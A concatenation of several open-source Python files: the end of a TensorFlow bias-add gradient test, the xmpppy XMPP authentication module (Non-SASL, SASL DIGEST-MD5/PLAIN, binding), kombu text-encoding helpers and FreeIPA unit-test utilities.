                [64, 2, 2, 2]).astype(np.float32)
        self._testGradient(np_input, bias, dtype, data_format, use_gpu)
        np_input = np.arange(
            1.0, 513.0, dtype=dtype.as_numpy_dtype).reshape(
                [2, 2, 2, 64]).astype(np.float32)
        self._testGradient(np_input,
                           np.random.rand(64).astype(dtype.as_numpy_dtype),
                           dtype, data_format, use_gpu)

  @test_util.run_deprecated_v1
  def testGradientTensor5D(self):
    for (data_format, use_gpu) in [("NHWC", False), ("NHWC", True),
                                   ("NCHW", False), ("NCHW", True)]:
      for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
        np_input = np.arange(
            1.0, 49.0, dtype=dtype.as_numpy_dtype).reshape(
                [1, 2, 3, 4, 2]).astype(np.float32)
        bias = np.array([1.3, 2.4], dtype=dtype.as_numpy_dtype)
        self._testGradient(np_input, bias, dtype, data_format, use_gpu)

  @test_util.run_deprecated_v1
  def testEmpty(self):
    """Zero-sized inputs must not crash the op."""
    np.random.seed(7)
    for shape in (0, 0), (2, 0), (0, 2), (4, 3, 0), (4, 0, 3), (0, 4, 3):
      self._testAll(np.random.randn(*shape), np.random.randn(shape[-1]))

  @test_util.run_deprecated_v1
  def testEmptyGradient(self):
    """Zero-sized inputs must not crash the gradient either."""
    for (data_format, use_gpu) in ("NHWC", False), ("NHWC", True):
      for shape in (0, 0), (2, 0), (0, 2):
        self._testGradient(
            np.random.randn(*shape), np.random.randn(shape[-1]), dtypes.float64,
            data_format, use_gpu)
    for (data_format, use_gpu) in [("NHWC", False), ("NHWC", True),
                                   ("NCHW", False), ("NCHW", True)]:
      for shape in (4, 3, 0), (4, 0, 3), (0, 4, 3):
        self._testGradient(
            np.random.randn(*shape),
            np.random.randn(shape[-1]), dtypes.float64, data_format, use_gpu)
# Run the test suite when executed directly.
if __name__ == "__main__":
  test.main()
|
jordan8037310/CouchPotatoServer | refs/heads/master | libs/xmpp/auth.py | 196 | ## auth.py
##
## Copyright (C) 2003-2005 Alexey "Snake" Nezhdanov
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2, or (at your option)
## any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
# $Id: auth.py,v 1.41 2008/09/13 21:45:21 normanr Exp $
"""
Provides library with all Non-SASL and SASL authentication mechanisms.
Can be used both for client and transport authentication.
"""
from protocol import *
from client import PlugIn

import base64
import hashlib
import md5
import random
import re
import sha

import dispatcher
def HH(some):
    """Return the hex MD5 digest of *some* -- HEX(H(s)) from RFC 2831."""
    # hashlib replaces the long-deprecated ``md5`` module (removed in Py3)
    # and produces byte-identical digests.
    return hashlib.md5(some).hexdigest()

def H(some):
    """Return the raw MD5 digest of *some* -- H(s) from RFC 2831."""
    return hashlib.md5(some).digest()

def C(some):
    """Colon-join the items of *some*, RFC 2831 concatenation."""
    return ':'.join(some)
class NonSASL(PlugIn):
    """ Implements old Non-SASL (JEP-0078) authentication used in jabberd1.4 and transport authentication."""
    def __init__(self,user,password,resource):
        """ Caches username, password and resource for auth. """
        PlugIn.__init__(self)
        self.DBG_LINE='gen_auth'
        self.user=user
        self.password=password
        self.resource=resource

    def plugin(self,owner):
        """ Determine the best auth method (digest/0k/plain) and use it for auth.
            Returns used method name on success. Used internally. """
        # An empty resource means we are authenticating as a component.
        if not self.resource: return self.authComponent(owner)
        self.DEBUG('Querying server about possible auth methods','start')
        resp=owner.Dispatcher.SendAndWaitForResponse(Iq('get',NS_AUTH,payload=[Node('username',payload=[self.user])]))
        if not isResultNode(resp):
            self.DEBUG('No result node arrived! Aborting...','error')
            return
        iq=Iq(typ='set',node=resp)
        query=iq.getTag('query')
        query.setTagData('username',self.user)
        query.setTagData('resource',self.resource)
        if query.getTag('digest'):
            # Digest auth: SHA1(stream-id + password), per JEP-0078.
            self.DEBUG("Performing digest authentication",'ok')
            query.setTagData('digest',sha.new(owner.Dispatcher.Stream._document_attrs['id']+self.password).hexdigest())
            if query.getTag('password'): query.delChild('password')
            method='digest'
        elif query.getTag('token'):
            token=query.getTagData('token')
            seq=query.getTagData('sequence')
            self.DEBUG("Performing zero-k authentication",'ok')
            # Zero-knowledge auth: iterate the SHA1 hash 'sequence' times.
            hash = sha.new(sha.new(self.password).hexdigest()+token).hexdigest()
            for foo in xrange(int(seq)): hash = sha.new(hash).hexdigest()
            query.setTagData('hash',hash)
            method='0k'
        else:
            # Last resort: password sent in clear text.
            self.DEBUG("Sequre methods unsupported, performing plain text authentication",'warn')
            query.setTagData('password',self.password)
            method='plain'
        resp=owner.Dispatcher.SendAndWaitForResponse(iq)
        if isResultNode(resp):
            self.DEBUG('Sucessfully authenticated with remove host.','ok')
            owner.User=self.user
            owner.Resource=self.resource
            owner._registered_name=owner.User+'@'+owner.Server+'/'+owner.Resource
            return method
        self.DEBUG('Authentication failed!','error')

    def authComponent(self,owner):
        """ Authenticate component. Send handshake stanza and wait for result. Returns "ok" on success. """
        # handshake: 0 = pending, 1 = accepted, -1 = rejected.
        self.handshake=0
        owner.send(Node(NS_COMPONENT_ACCEPT+' handshake',payload=[sha.new(owner.Dispatcher.Stream._document_attrs['id']+self.password).hexdigest()]))
        owner.RegisterHandler('handshake',self.handshakeHandler,xmlns=NS_COMPONENT_ACCEPT)
        while not self.handshake:
            self.DEBUG("waiting on handshake",'notify')
            owner.Process(1)
        owner._registered_name=self.user
        if self.handshake+1: return 'ok'

    def handshakeHandler(self,disp,stanza):
        """ Handler for registering in dispatcher for accepting transport authentication. """
        if stanza.getName()=='handshake': self.handshake=1
        else: self.handshake=-1
class SASL(PlugIn):
    """ Implements SASL authentication. """
    def __init__(self,username,password):
        PlugIn.__init__(self)
        self.username=username
        self.password=password

    def plugin(self,owner):
        # Pre-XMPP-1.0 streams (no 'version' attribute) cannot do SASL.
        if not self._owner.Dispatcher.Stream._document_attrs.has_key('version'): self.startsasl='not-supported'
        elif self._owner.Dispatcher.Stream.features:
            try: self.FeaturesHandler(self._owner.Dispatcher,self._owner.Dispatcher.Stream.features)
            except NodeProcessed: pass
        else: self.startsasl=None

    def auth(self):
        """ Start authentication. Result can be obtained via "SASL.startsasl" attribute and will be
            either "success" or "failure". Note that successfull auth will take at least
            two Dispatcher.Process() calls. """
        if self.startsasl: pass
        elif self._owner.Dispatcher.Stream.features:
            try: self.FeaturesHandler(self._owner.Dispatcher,self._owner.Dispatcher.Stream.features)
            except NodeProcessed: pass
        else: self._owner.RegisterHandler('features',self.FeaturesHandler,xmlns=NS_STREAMS)

    def plugout(self):
        """ Remove SASL handlers from owner's dispatcher. Used internally. """
        if self._owner.__dict__.has_key('features'): self._owner.UnregisterHandler('features',self.FeaturesHandler,xmlns=NS_STREAMS)
        if self._owner.__dict__.has_key('challenge'): self._owner.UnregisterHandler('challenge',self.SASLHandler,xmlns=NS_SASL)
        if self._owner.__dict__.has_key('failure'): self._owner.UnregisterHandler('failure',self.SASLHandler,xmlns=NS_SASL)
        if self._owner.__dict__.has_key('success'): self._owner.UnregisterHandler('success',self.SASLHandler,xmlns=NS_SASL)

    def FeaturesHandler(self,conn,feats):
        """ Used to determine if server supports SASL auth. Used internally. """
        if not feats.getTag('mechanisms',namespace=NS_SASL):
            self.startsasl='not-supported'
            self.DEBUG('SASL not supported by server','error')
            return
        mecs=[]
        for mec in feats.getTag('mechanisms',namespace=NS_SASL).getTags('mechanism'):
            mecs.append(mec.getData())
        self._owner.RegisterHandler('challenge',self.SASLHandler,xmlns=NS_SASL)
        self._owner.RegisterHandler('failure',self.SASLHandler,xmlns=NS_SASL)
        self._owner.RegisterHandler('success',self.SASLHandler,xmlns=NS_SASL)
        # Mechanism preference: ANONYMOUS (when no username), DIGEST-MD5, PLAIN.
        if "ANONYMOUS" in mecs and self.username == None:
            node=Node('auth',attrs={'xmlns':NS_SASL,'mechanism':'ANONYMOUS'})
        elif "DIGEST-MD5" in mecs:
            node=Node('auth',attrs={'xmlns':NS_SASL,'mechanism':'DIGEST-MD5'})
        elif "PLAIN" in mecs:
            sasl_data='%s\x00%s\x00%s'%(self.username+'@'+self._owner.Server,self.username,self.password)
            node=Node('auth',attrs={'xmlns':NS_SASL,'mechanism':'PLAIN'},payload=[base64.encodestring(sasl_data).replace('\r','').replace('\n','')])
        else:
            self.startsasl='failure'
            self.DEBUG('I can only use DIGEST-MD5 and PLAIN mecanisms.','error')
            return
        self.startsasl='in-process'
        self._owner.send(node.__str__())
        raise NodeProcessed

    def SASLHandler(self,conn,challenge):
        """ Perform next SASL auth step. Used internally. """
        if challenge.getNamespace()<>NS_SASL: return
        if challenge.getName()=='failure':
            self.startsasl='failure'
            try: reason=challenge.getChildren()[0]
            except: reason=challenge
            self.DEBUG('Failed SASL authentification: %s'%reason,'error')
            raise NodeProcessed
        elif challenge.getName()=='success':
            self.startsasl='success'
            self.DEBUG('Successfully authenticated with remote server.','ok')
            # The stream restarts after SASL success: rebuild the dispatcher
            # while preserving the handlers registered so far.
            handlers=self._owner.Dispatcher.dumpHandlers()
            self._owner.Dispatcher.PlugOut()
            dispatcher.Dispatcher().PlugIn(self._owner)
            self._owner.Dispatcher.restoreHandlers(handlers)
            self._owner.User=self.username
            raise NodeProcessed
        # -- DIGEST-MD5 challenge/response step (RFC 2831) --
        incoming_data=challenge.getData()
        chal={}
        data=base64.decodestring(incoming_data)
        self.DEBUG('Got challenge:'+data,'ok')
        # Parse comma-separated key=value pairs; values may be double-quoted.
        for pair in re.findall('(\w+\s*=\s*(?:(?:"[^"]+")|(?:[^,]+)))',data):
            key,value=[x.strip() for x in pair.split('=', 1)]
            if value[:1]=='"' and value[-1:]=='"': value=value[1:-1]
            chal[key]=value
        if chal.has_key('qop') and 'auth' in [x.strip() for x in chal['qop'].split(',')]:
            # Build the digest-response as specified by RFC 2831.
            resp={}
            resp['username']=self.username
            resp['realm']=self._owner.Server
            resp['nonce']=chal['nonce']
            cnonce=''
            for i in range(7):
                cnonce+=hex(int(random.random()*65536*4096))[2:]
            resp['cnonce']=cnonce
            resp['nc']=('00000001')
            resp['qop']='auth'
            resp['digest-uri']='xmpp/'+self._owner.Server
            A1=C([H(C([resp['username'],resp['realm'],self.password])),resp['nonce'],resp['cnonce']])
            A2=C(['AUTHENTICATE',resp['digest-uri']])
            response= HH(C([HH(A1),resp['nonce'],resp['nc'],resp['cnonce'],resp['qop'],HH(A2)]))
            resp['response']=response
            resp['charset']='utf-8'
            sasl_data=''
            for key in ['charset','username','realm','nonce','nc','cnonce','digest-uri','response','qop']:
                if key in ['nc','qop','response','charset']: sasl_data+="%s=%s,"%(key,resp[key])
                else: sasl_data+='%s="%s",'%(key,resp[key])
            # Strip the trailing comma before base64-encoding the response.
            node=Node('response',attrs={'xmlns':NS_SASL},payload=[base64.encodestring(sasl_data[:-1]).replace('\r','').replace('\n','')])
            self._owner.send(node.__str__())
        elif chal.has_key('rspauth'): self._owner.send(Node('response',attrs={'xmlns':NS_SASL}).__str__())
        else:
            self.startsasl='failure'
            self.DEBUG('Failed SASL authentification: unknown challenge','error')
        raise NodeProcessed
class Bind(PlugIn):
    """ Bind some JID to the current connection to allow router know of our location."""
    def __init__(self):
        PlugIn.__init__(self)
        self.DBG_LINE='bind'
        # bound: None = undecided, [] = bindable, 'failure' = unsupported.
        self.bound=None

    def plugin(self,owner):
        """ Start resource binding, if allowed at this time. Used internally. """
        if self._owner.Dispatcher.Stream.features:
            try: self.FeaturesHandler(self._owner.Dispatcher,self._owner.Dispatcher.Stream.features)
            except NodeProcessed: pass
        else: self._owner.RegisterHandler('features',self.FeaturesHandler,xmlns=NS_STREAMS)

    def plugout(self):
        """ Remove Bind handler from owner's dispatcher. Used internally. """
        self._owner.UnregisterHandler('features',self.FeaturesHandler,xmlns=NS_STREAMS)

    def FeaturesHandler(self,conn,feats):
        """ Determine if server supports resource binding and set some internal attributes accordingly. """
        if not feats.getTag('bind',namespace=NS_BIND):
            self.bound='failure'
            self.DEBUG('Server does not requested binding.','error')
            return
        if feats.getTag('session',namespace=NS_SESSION): self.session=1
        else: self.session=-1
        self.bound=[]

    def Bind(self,resource=None):
        """ Perform binding. Use provided resource name or random (if not provided). """
        # Spin the dispatcher until the <features/> stanza has been handled.
        while self.bound is None and self._owner.Process(1): pass
        if resource: resource=[Node('resource',payload=[resource])]
        else: resource=[]
        resp=self._owner.SendAndWaitForResponse(Protocol('iq',typ='set',payload=[Node('bind',attrs={'xmlns':NS_BIND},payload=resource)]))
        if isResultNode(resp):
            self.bound.append(resp.getTag('bind').getTagData('jid'))
            self.DEBUG('Successfully bound %s.'%self.bound[-1],'ok')
            jid=JID(resp.getTag('bind').getTagData('jid'))
            self._owner.User=jid.getNode()
            self._owner.Resource=jid.getResource()
            # RFC 3921 session establishment follows a successful bind.
            resp=self._owner.SendAndWaitForResponse(Protocol('iq',typ='set',payload=[Node('session',attrs={'xmlns':NS_SESSION})]))
            if isResultNode(resp):
                self.DEBUG('Successfully opened session.','ok')
                self.session=1
                return 'ok'
            else:
                self.DEBUG('Session open failed.','error')
                self.session=0
        elif resp: self.DEBUG('Binding failed: %s.'%resp.getTag('error'),'error')
        else:
            self.DEBUG('Binding failed: timeout expired.','error')
            return ''
class ComponentBind(PlugIn):
    """ ComponentBind some JID to the current connection to allow router know of our location."""
    def __init__(self, sasl):
        PlugIn.__init__(self)
        self.DBG_LINE='bind'
        self.bound=None
        self.needsUnregister=None
        # Whether the component authenticated via SASL (affects bind xmlns).
        self.sasl = sasl

    def plugin(self,owner):
        """ Start resource binding, if allowed at this time. Used internally. """
        if not self.sasl:
            # Old-style (non-SASL) components bind unconditionally.
            self.bound=[]
            return
        if self._owner.Dispatcher.Stream.features:
            try: self.FeaturesHandler(self._owner.Dispatcher,self._owner.Dispatcher.Stream.features)
            except NodeProcessed: pass
        else:
            self._owner.RegisterHandler('features',self.FeaturesHandler,xmlns=NS_STREAMS)
            self.needsUnregister=1

    def plugout(self):
        """ Remove ComponentBind handler from owner's dispatcher. Used internally. """
        if self.needsUnregister:
            self._owner.UnregisterHandler('features',self.FeaturesHandler,xmlns=NS_STREAMS)

    def FeaturesHandler(self,conn,feats):
        """ Determine if server supports resource binding and set some internal attributes accordingly. """
        if not feats.getTag('bind',namespace=NS_BIND):
            self.bound='failure'
            self.DEBUG('Server does not requested binding.','error')
            return
        if feats.getTag('session',namespace=NS_SESSION): self.session=1
        else: self.session=-1
        self.bound=[]

    def Bind(self,domain=None):
        """ Perform binding. Use provided domain name (if not provided). """
        # Spin the dispatcher until the <features/> stanza has been handled.
        while self.bound is None and self._owner.Process(1): pass
        if self.sasl:
            xmlns = NS_COMPONENT_1
        else:
            xmlns = None
        self.bindresponse = None
        # ttl counts down Process() iterations so we cannot wait forever.
        ttl = dispatcher.DefaultTimeout
        self._owner.RegisterHandler('bind',self.BindHandler,xmlns=xmlns)
        self._owner.send(Protocol('bind',attrs={'name':domain},xmlns=NS_COMPONENT_1))
        while self.bindresponse is None and self._owner.Process(1) and ttl > 0: ttl-=1
        self._owner.UnregisterHandler('bind',self.BindHandler,xmlns=xmlns)
        resp=self.bindresponse
        if resp and resp.getAttr('error'):
            self.DEBUG('Binding failed: %s.'%resp.getAttr('error'),'error')
        elif resp:
            self.DEBUG('Successfully bound.','ok')
            return 'ok'
        else:
            self.DEBUG('Binding failed: timeout expired.','error')
            return ''

    def BindHandler(self,conn,bind):
        """ Stores the router's <bind/> answer for Bind() to inspect. """
        self.bindresponse = bind
        pass
|
CamelBackNotation/CarnotKE | refs/heads/master | jyhton/Lib/test/bugs/pr144.py | 31 | from java.lang import *
Class.isArray(Thread)
|
tkanemoto/kombu | refs/heads/master | kombu/utils/encoding.py | 39 | # -*- coding: utf-8 -*-
"""
kombu.utils.encoding
~~~~~~~~~~~~~~~~~~~~~
Utilities to encode text, and to safely emit text from running
applications without crashing with the infamous :exc:`UnicodeDecodeError`
exception.
"""
from __future__ import absolute_import
import sys
import traceback
from kombu.five import text_t
is_py3k = sys.version_info >= (3, 0)
#: safe_str takes encoding from this file by default.
#: :func:`set_default_encoding_file` can used to set the
#: default output file.
default_encoding_file = None


def set_default_encoding_file(file):
    """Register *file* as the process-wide source of the default encoding."""
    global default_encoding_file
    default_encoding_file = file


def get_default_encoding_file():
    """Return the file registered as the default encoding source (or None)."""
    return default_encoding_file
# Jython always reports utf-8; elsewhere prefer the stream's own encoding,
# falling back to the filesystem encoding.
if sys.platform.startswith('java'):  # pragma: no cover

    def default_encoding(file=None):
        """Return the default text encoding (always utf-8 on Jython)."""
        return 'utf-8'
else:

    def default_encoding(file=None):  # noqa
        """Return the encoding of *file* (or the registered default file)."""
        file = file or get_default_encoding_file()
        return getattr(file, 'encoding', None) or sys.getfilesystemencoding()
# Text/bytes conversion helpers with Python 2/3 specific implementations.
if is_py3k:  # pragma: no cover

    def str_to_bytes(s):
        # Encode text to bytes; bytes pass through unchanged.
        if isinstance(s, str):
            return s.encode()
        return s

    def bytes_to_str(s):
        # Decode bytes to text; text passes through unchanged.
        if isinstance(s, bytes):
            return s.decode()
        return s

    def from_utf8(s, *args, **kwargs):
        # On Python 3 text is already unicode; nothing to do.
        return s

    def ensure_bytes(s):
        if not isinstance(s, bytes):
            return str_to_bytes(s)
        return s

    def default_encode(obj):
        return obj

    str_t = str
else:

    def str_to_bytes(s):  # noqa
        if isinstance(s, unicode):
            return s.encode()
        return s

    def bytes_to_str(s):  # noqa
        # Python 2 str is already bytes.
        return s

    def from_utf8(s, *args, **kwargs):  # noqa
        return s.encode('utf-8', *args, **kwargs)

    def default_encode(obj, file=None):  # noqa
        return unicode(obj, default_encoding(file))

    str_t = unicode
    ensure_bytes = str_to_bytes


try:
    bytes_t = bytes
except NameError:  # pragma: no cover
    bytes_t = str  # noqa
def safe_str(s, errors='replace'):
    """Coerce *s* to text without ever raising an encoding error.

    Strings and bytes go through :func:`_safe_str`; any other object is
    rendered with :func:`safe_repr`.
    """
    s = bytes_to_str(s)
    if isinstance(s, (text_t, bytes)):
        return _safe_str(s, errors)
    return safe_repr(s, errors)
# _safe_str: best-effort text coercion that reports (instead of raising)
# conversion failures; implementation differs between Python 2 and 3.
if is_py3k:

    def _safe_str(s, errors='replace', file=None):
        if isinstance(s, str):
            return s
        try:
            return str(s)
        except Exception as exc:
            # Include the stack so the failing caller can be located.
            return '<Unrepresentable {0!r}: {1!r} {2!r}>'.format(
                type(s), exc, '\n'.join(traceback.format_stack()))
else:

    def _safe_str(s, errors='replace', file=None):  # noqa
        encoding = default_encoding(file)
        try:
            if isinstance(s, unicode):
                return s.encode(encoding, errors)
            return unicode(s, encoding, errors)
        except Exception as exc:
            return '<Unrepresentable {0!r}: {1!r} {2!r}>'.format(
                type(s), exc, '\n'.join(traceback.format_stack()))
def safe_repr(o, errors='replace'):
    """Like :func:`repr` but never propagates an exception."""
    try:
        rep = repr(o)
    except Exception:
        rep = _safe_str(o, errors)
    return rep
|
jtux270/translate | refs/heads/master | FreeIPA/freeipa-3.0.0/tests/util.py | 2 | # Authors:
# Jason Gerard DeRose <jderose@redhat.com>
#
# Copyright (C) 2008 Red Hat
# see file 'COPYING' for use and warranty information
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Common utility functions and classes for unit tests.
"""
import inspect
import os
from os import path
import tempfile
import shutil
import re
import ipalib
from ipalib.plugable import Plugin
from ipalib.request import context
from ipapython.dn import DN
class TempDir(object):
    """A throw-away directory under ``/tmp/ipa.tests.*`` for test fixtures."""

    def __init__(self):
        self.__path = tempfile.mkdtemp(prefix='ipa.tests.')
        assert self.path == self.__path

    @property
    def path(self):
        """Absolute path of the directory, sanity-checked on every access."""
        assert path.abspath(self.__path) == self.__path
        assert self.__path.startswith('/tmp/ipa.tests.')
        assert path.isdir(self.__path) and not path.islink(self.__path)
        return self.__path

    def rmtree(self):
        """Remove the whole tree; safe to call more than once."""
        if self.__path is not None:
            shutil.rmtree(self.path)
            self.__path = None

    def makedirs(self, *parts):
        """Create (if needed) and return the sub-directory named by *parts*."""
        subdir = self.join(*parts)
        if not path.exists(subdir):
            os.makedirs(subdir)
        assert path.isdir(subdir) and not path.islink(subdir)
        return subdir

    def __new_file(self, parts):
        # Shared by touch()/write(): ensure parents exist, file must not.
        parent = self.makedirs(*parts[:-1])
        name = path.join(parent, parts[-1])
        assert not path.exists(name)
        return name

    def touch(self, *parts):
        """Create an empty file at *parts* and return its path."""
        name = self.__new_file(parts)
        open(name, 'w').close()
        assert path.isfile(name) and not path.islink(name)
        return name

    def write(self, content, *parts):
        """Write *content* to a brand-new file at *parts*; return its path."""
        name = self.__new_file(parts)
        open(name, 'w').write(content)
        assert path.isfile(name) and not path.islink(name)
        return name

    def join(self, *parts):
        """Return *parts* joined below the temporary directory."""
        return path.join(self.path, *parts)

    def __del__(self):
        self.rmtree()
class TempHome(TempDir):
    """
    Temporary directory that also becomes ``$HOME`` for its lifetime.
    """

    def __init__(self):
        super(TempHome, self).__init__()
        # Remember the original $HOME (never restored automatically).
        self.__home = os.environ['HOME']
        os.environ['HOME'] = self.path
class ExceptionNotRaised(Exception):
    """
    Raised when an *expected* exception does not occur during a unit test.
    """

    msg = 'expected %s'

    def __init__(self, expected):
        # ``expected`` is the exception class that should have been raised.
        self.expected = expected

    def __str__(self):
        return self.msg % (self.expected.__name__,)
def assert_equal(val1, val2):
    """
    Assert that ``val1`` and ``val2`` have the same type and equal value.
    """
    detail = '%r != %r' % (val1, val2)
    assert type(val1) is type(val2), detail
    assert val1 == val2, detail
def assert_not_equal(val1, val2):
    """
    Assert that ``val1`` and ``val2`` have the same type but unequal values.
    """
    assert type(val1) is type(val2), '%r != %r' % (val1, val2)
    assert val1 != val2, '%r == %r' % (val1, val2)
class Fuzzy(object):
    """
    Perform a fuzzy (non-strict) equality tests.

    `Fuzzy` instances will likely be used when comparing nesting
    data-structures using `assert_deepequal()`.

    By default a `Fuzzy` instance is equal to everything.  For example, all of
    these evaluate to ``True``:

    >>> Fuzzy() == False
    True
    >>> 7 == Fuzzy()  # Order doesn't matter
    True
    >>> Fuzzy() == u'Hello False, Lucky 7!'
    True

    The first optional argument *regex* is a regular expression pattern to
    match.  For example, you could match a phone number like this:

    >>> phone = Fuzzy('^\d{3}-\d{3}-\d{4}$')
    >>> u'123-456-7890' == phone
    True

    Use of a regular expression by default implies the ``unicode`` type, so
    comparing with an ``str`` instance will evaluate to ``False``:

    >>> phone.type
    <type 'unicode'>
    >>> '123-456-7890' == phone
    False

    The *type* kwarg allows you to specify a type constraint, so you can force
    the above to work on ``str`` instances instead:

    >>> '123-456-7890' == Fuzzy('^\d{3}-\d{3}-\d{4}$', type=str)
    True

    You can also use the *type* constraint on its own without the *regex*,
    for example:

    >>> 42 == Fuzzy(type=int)
    True
    >>> 42.0 == Fuzzy(type=int)
    False
    >>> 42.0 == Fuzzy(type=(int, float))
    True

    Finally the *test* kwarg is an optional callable that will be called to
    perform the loose equality test.  For example:

    >>> 42 == Fuzzy(test=lambda other: other > 42)
    False
    >>> 43 == Fuzzy(test=lambda other: other > 42)
    True

    You can use *type* and *test* together.  For example:

    >>> 43 == Fuzzy(type=float, test=lambda other: other > 42)
    False
    >>> 42.5 == Fuzzy(type=float, test=lambda other: other > 42)
    True

    The *regex*, *type*, and *test* kwargs are all available via attributes
    on the `Fuzzy` instance:

    >>> fuzzy = Fuzzy('.+', type=str, test=lambda other: True)
    >>> fuzzy.regex
    '.+'
    >>> fuzzy.type
    <type 'str'>
    >>> fuzzy.test  # doctest:+ELLIPSIS
    <function <lambda> at 0x...>

    To aid debugging, `Fuzzy.__repr__()` reveals these kwargs as well:

    >>> fuzzy  # doctest:+ELLIPSIS
    Fuzzy('.+', <type 'str'>, <function <lambda> at 0x...>)
    """

    def __init__(self, regex=None, type=None, test=None):
        """
        Initialize.

        :param regex: A regular expression pattern to match, e.g.
            ``u'^\d+foo'``

        :param type: A type or tuple of types to test using ``isinstance()``,
            e.g. ``(int, float)``

        :param test: A callable used to perform equality test, e.g.
            ``lambda other: other >= 18``
        """
        assert regex is None or isinstance(regex, basestring)
        assert test is None or callable(test)
        if regex is None:
            self.re = None
        else:
            self.re = re.compile(regex)
            # A regex implies a text comparand; default the type constraint
            # to unicode and forbid non-string type constraints.
            if type is None:
                type = unicode
            assert type in (unicode, str, basestring)
        self.regex = regex
        self.type = type
        self.test = test

    def __repr__(self):
        return '%s(%r, %r, %r)' % (
            self.__class__.__name__, self.regex, self.type, self.test
        )

    def __eq__(self, other):
        # Each configured constraint must pass; unset constraints pass.
        if not (self.type is None or isinstance(other, self.type)):
            return False
        if not (self.re is None or self.re.search(other)):
            return False
        if not (self.test is None or self.test(other)):
            return False
        return True

    def __ne__(self, other):
        return not self.__eq__(other)
VALUE = """assert_deepequal: expected != got.
%s
expected = %r
got = %r
path = %r"""
TYPE = """assert_deepequal: type(expected) is not type(got).
%s
type(expected) = %r
type(got) = %r
expected = %r
got = %r
path = %r"""
LEN = """assert_deepequal: list length mismatch.
%s
len(expected) = %r
len(got) = %r
expected = %r
got = %r
path = %r"""
KEYS = """assert_deepequal: dict keys mismatch.
%s
missing keys = %r
extra keys = %r
expected = %r
got = %r
path = %r"""
def assert_deepequal(expected, got, doc='', stack=tuple()):
    """
    Recursively check for type and equality.

    If a value in expected is callable then it will used as a callback to
    test for equality on the got value. The callback is passed the got
    value and returns True if equal, False otherwise.

    If the tests fails, it will raise an ``AssertionError`` with detailed
    information, including the path to the offending value. For example:

    >>> expected = [u'Hello', dict(world=u'how are you?')]
    >>> got = [u'Hello', dict(world='how are you?')]
    >>> expected == got
    True
    >>> assert_deepequal(expected, got, doc='Testing my nested data')
    Traceback (most recent call last):
      ...
    AssertionError: assert_deepequal: type(expected) is not type(got).
      Testing my nested data
      type(expected) = <type 'unicode'>
      type(got) = <type 'str'>
      expected = u'how are you?'
      got = 'how are you?'
      path = (0, 'world')

    Note that lists and tuples are considered equivalent, and the order of
    their elements does not matter.
    """
    # Normalize tuples to lists so a tuple/list pair passes the type check.
    if isinstance(expected, tuple):
        expected = list(expected)
    if isinstance(got, tuple):
        got = list(got)
    # Allow a DN object to match its string form by parsing the got string.
    if isinstance(expected, DN):
        if isinstance(got, basestring):
            got = DN(got)
    # Fuzzy and callable expected values deliberately bypass the strict
    # type(expected) is type(got) check.
    if not (isinstance(expected, Fuzzy) or callable(expected) or type(expected) is type(got)):
        raise AssertionError(
            TYPE % (doc, type(expected), type(got), expected, got, stack)
        )
    if isinstance(expected, (list, tuple)):
        if len(expected) != len(got):
            raise AssertionError(
                LEN % (doc, len(expected), len(got), expected, got, stack)
            )
        # Sort both sides first: element order is intentionally ignored.
        s_got = sorted(got)
        s_expected = sorted(expected)
        for (i, e_sub) in enumerate(s_expected):
            g_sub = s_got[i]
            assert_deepequal(e_sub, g_sub, doc, stack + (i,))
    elif isinstance(expected, dict):
        missing = set(expected).difference(got)
        extra = set(got).difference(expected)
        if missing or extra:
            raise AssertionError(KEYS % (
                doc, sorted(missing), sorted(extra), expected, got, stack
                )
            )
        for key in sorted(expected):
            e_sub = expected[key]
            g_sub = got[key]
            assert_deepequal(e_sub, g_sub, doc, stack + (key,))
    elif callable(expected):
        # Callback equality: expected(got) must be truthy.
        if not expected(got):
            raise AssertionError(
                VALUE % (doc, expected, got, stack)
            )
    elif expected != got:
        raise AssertionError(
            VALUE % (doc, expected, got, stack)
        )
def raises(exception, callback, *args, **kw):
    """
    Call ``callback(*args, **kw)`` and return the raised *exception*.

    :param exception: Exception class (or tuple of classes) expected.
    :param callback: Callable expected to raise.
    Raises ExceptionNotRaised if *callback* completes without raising.

    Fix vs. original: the py2-only ``except exception, e:`` syntax is replaced
    with ``as``, and the caught exception is copied into a separate name
    because Python 3 unbinds the ``as`` target when the except block exits
    (the original ``return e`` would raise NameError on py3).
    """
    caught = None
    try:
        callback(*args, **kw)
    except exception as e:
        caught = e
    if caught is None:
        raise ExceptionNotRaised(exception)
    return caught
def getitem(obj, key):
    """
    Dictionary-interface analogue of ``getattr``.

    Combine with raises() to verify that, e.g., KeyError is raised.
    """
    value = obj[key]
    return value
def setitem(obj, key, value):
    """
    Dictionary-interface analogue of ``setattr``.

    Combine with raises() to verify that, e.g., TypeError is raised.
    """
    obj[key] = value
def delitem(obj, key):
    """
    Dictionary-interface analogue of ``delattr``.

    Combine with raises() to verify that, e.g., TypeError is raised.
    """
    del obj[key]
def no_set(obj, name, value='some_new_obj'):
    """Assert that attribute *name* cannot be set on *obj*."""
    raises(AttributeError, setattr, obj, name, value)
def no_del(obj, name):
    """Assert that attribute *name* cannot be deleted from *obj*."""
    raises(AttributeError, delattr, obj, name)
def read_only(obj, name, value='some_new_obj'):
    """Assert attribute *name* on *obj* is read-only and return its value."""
    no_set(obj, name, value)   # setting must fail
    no_del(obj, name)          # deleting must fail
    return getattr(obj, name)  # reading must still work
def is_prop(prop):
    """Return True only if *prop* is exactly a ``property`` instance."""
    return property is type(prop)
class ClassChecker(object):
    """
    Base class for tests that exercise a class (``_cls``) and, optionally,
    a subclass provided by overriding ``get_subcls()``.
    """

    __cls = None     # lazily-resolved class under test
    __subcls = None  # lazily-resolved subclass under test

    def __get_cls(self):
        cached = self.__cls
        if cached is None:
            cached = self.__cls = self._cls
        assert inspect.isclass(cached)
        return cached
